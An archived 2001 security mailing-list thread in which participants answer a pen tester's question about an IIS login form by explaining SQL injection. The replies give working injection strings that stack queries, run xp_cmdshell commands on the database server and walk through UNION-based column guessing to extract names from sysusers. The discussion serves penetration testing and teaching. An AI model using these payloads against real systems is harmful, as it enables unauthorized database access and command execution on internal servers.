Andrew said:

>Don't you need the returned recordset to be written to the html stream in
>order to see anything useful? For instance if you are just looking at a
>login page you may not get any joy with appending extra SELECTs? We have
>just been playing with exactly this!
>
>Andrew Miller

.. yes, but .. the first thing is .. there is no need for html output when
you can execute system commands (xp_cmdshell .., sp_adduser etc. ....), and
html output can be achieved by

a) using aliases (AS)
b) brute-forcing the column(s) you can see within the output using "UNION"

HowTo:
1) guess the number of columns from table A by column padding (see example)
2) find the right column number within the query (see example)
3) if necessary, typecast columns

example:

---cut here---
sequence I

[original] union select '1' from sysusers;--
[original] union select '1','1' from sysusers;--
[original] union select '1','1','1' from sysusers;--
[original] union select '1','1','1','1' from sysusers;--

after no error message

sequence II

[original] union select name,'1','1','1' from sysusers;--
[original] union select '1',name,'1','1' from sysusers;--
[original] union select '1','1',name,'1' from sysusers;--

.. until name appears within html .... tataa
---cut here---

nice day,
rc

securityat_private
http://www.freefly.com/security/

>You might (90% chance) have a possibility to
>
>a) alter the database
>b) execute remote commands in the SQL server
>
>This is a common error (not quoting quotes :). It is due to the SQL
>statement executed by the IIS server (through an ODBC connection) simply
>having the information given by the user appended to it.
>
>Thus:
>
>SELECT * from test where value='$user'
>
>if user=' becomes:
>
>SELECT * from test where value='''
>
>which generates your error.
>
>However, you can do the following:
>if user=test'; select * from test -- becomes:
>
>SELECT * from test where value='test'; select * from test -- '
>
>which is a valid SQL statement (two as a matter of fact), and
>if user=test'; exec master..xp_cmdshell 'dir' -- becomes:
>
>SELECT * from test where value='test'; exec master..xp_cmdshell 'dir' --
>
>which will run the 'dir' command in the SQL server (not in the IIS!)
>This is fun since, in some cases, the IIS server is in a DMZ and the SQL
>server is in the internal lan or behind another firewall, like this:
>
>Internet ----- Fw -------- Fw --------- Local network
>                |                         |
>               IIS                   SQL server
>
>or
>
>Internet ----- Fw -------- Local network
>                |               |
>               IIS          SQL server
>
>So you might be one step closer to your target!
>
>Some references (fresh out from google):
>http://www.sqlsecurity.com/faq-inj.asp
>http://www.silksoft.co.za/data/sqlinjectionattack.htm
>
> Regards
>
> Javier Fernández-Sanguino Peña
>
> > Hello all,
> >
> > I am doing a pen test against an IIS 5 web server. The web server
> > requires a user name and password via a logon form. If a single quote
> > character is entered (username) the following error is produced:
> >
> > [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark
> > before the character string '' and password=''.
> >
> > I remember reading somewhere that this can be used to gain further
> > access, but I can't find the info.
> >
> > Can anyone help?
> >
> > Thanks in advance.
> >
> > Gary
> >
> > ----------------------------------------------------------------------------
> > This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
> > Service.
> > For more information on SecurityFocus' SIA service which
> > automatically alerts you to the latest security vulnerabilities please see:
> > https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Thu Nov 22 2001 - 09:41:28 PST